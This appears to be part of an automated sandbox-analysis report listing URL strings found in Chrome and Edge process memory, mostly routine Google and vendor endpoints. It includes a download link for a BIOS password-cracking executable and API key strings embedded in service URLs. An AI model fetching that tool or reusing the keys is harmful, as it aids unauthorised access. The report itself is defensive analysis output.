Source: chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://alldrivers4devices.net/
Source: chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/42265720
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msedge.exe, 0000001B.00000002.169649265439.0000017289213000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172789542288.00000123A9189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beastacademy.com/checkout/cart
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381998737.00000C64014A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 0000002C.00000002.172376425526.00000C6400CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cart.ebay.com/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cart.godaddy.com/go/checkout
Source: chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379010998.00000C6401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: chrome.exe, 0000002C.00000003.172278206490.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172809204333.00007B1C008C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804790039.00007B1C00170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002C.00000002.172384589063.00000C64018A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376198228.00000C6400C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279262207.00000C64018DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384741780.00000C64018E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000017.00000003.169459350575.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169454409276.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275208595.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172274655981.00000C640154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273477177.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278206490.00000C6401640000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: msedge.exe, 0000001B.00000002.169652654170.000053D000170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfnapp.window.fullscreen.overrideEsc
Source: chrome.exe, 00000017.00000003.169436742836.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169486966290.00000D7401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488638516.00000D7401A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169486687819.00000D7401A08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489047291.00000D7401AA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487814047.00000D7401A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488804802.00000D7401AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488212575.00000D7401A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487213251.00000D7401A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488387108.00000D7401A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169436974674.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489208657.00000D7401AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487441738.00000D7401A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488002818.00000D7401A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305669612.00000C6401B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258264830.00000C6000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172367969728.00000C6000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305329602.00000C6401B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304347144.00000C6401B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304106720.00000C6401B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303148142.00000C6401AE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002C.00000003.172258264830.00000C6000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258353859.00000C600053C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_
Source: chrome.exe, 0000002C.00000003.172258353859.00000C600053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304542351.00000C6401B28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303373850.00000C6401AE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304859419.00000C6401B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172260291643.00000C6000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303589205.00000C6401AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172302920264.00000C6401AD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000017.00000003.169436742836.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169436974674.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172367969728.00000C6000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172260683211.00000C6000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172260291643.00000C6000650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 0000002C.00000003.172258264830.00000C6000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258353859.00000C600053C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_
Source: chrome.exe, 00000017.00000003.169488002818.00000D7401A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435116809.00000D7000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305669612.00000C6401B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305329602.00000C6401B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304347144.00000C6401B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304106720.00000C6401B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303148142.00000C6401AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305100980.00000C6401B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305516384.00000C6401B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303847746.00000C6401AF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304542351.00000C6401B28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303373850.00000C6401AE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304859419.00000C6401B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303589205.00000C6401AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172302920264.00000C6401AD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172368114920.00000C6000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002C.00000002.172368451942.00000C6400004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
Source: chrome.exe, 0000002C.00000002.172368451942.00000C6400004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172476178727.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172471137526.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172536566096.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172535173785.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172478894965.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172805827120.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172472119076.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000017.00000003.169441984123.00000D740023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455273322.00000D740023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172265377246.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275070066.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370269683.00000C6400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000017.00000003.169428451009.00003110000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169428533974.00003110000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172255551708.000042D0000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172255589824.000042D0000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002C.00000002.172369840140.00000C64001A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370269683.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374307525.00000C64009F0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804919405.00007B1C001E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000002C.00000002.172373177537.00000C640088C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000002C.00000002.172373177537.00000C640088C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/
Source: chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Source: chrome.exe, 00000017.00000003.169454409276.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273477177.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
Source: msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: chrome.exe, 0000002C.00000002.172379241276.00000C6401188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381124600.00000C64013C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/p
Source: chrome.exe, 0000002C.00000002.172376425526.00000C6400CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002C.00000002.172376425526.00000C6400CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376725260.00000C6400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277996543.00000C64004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381586361.00000C6401438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377361676.00000C6400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultor
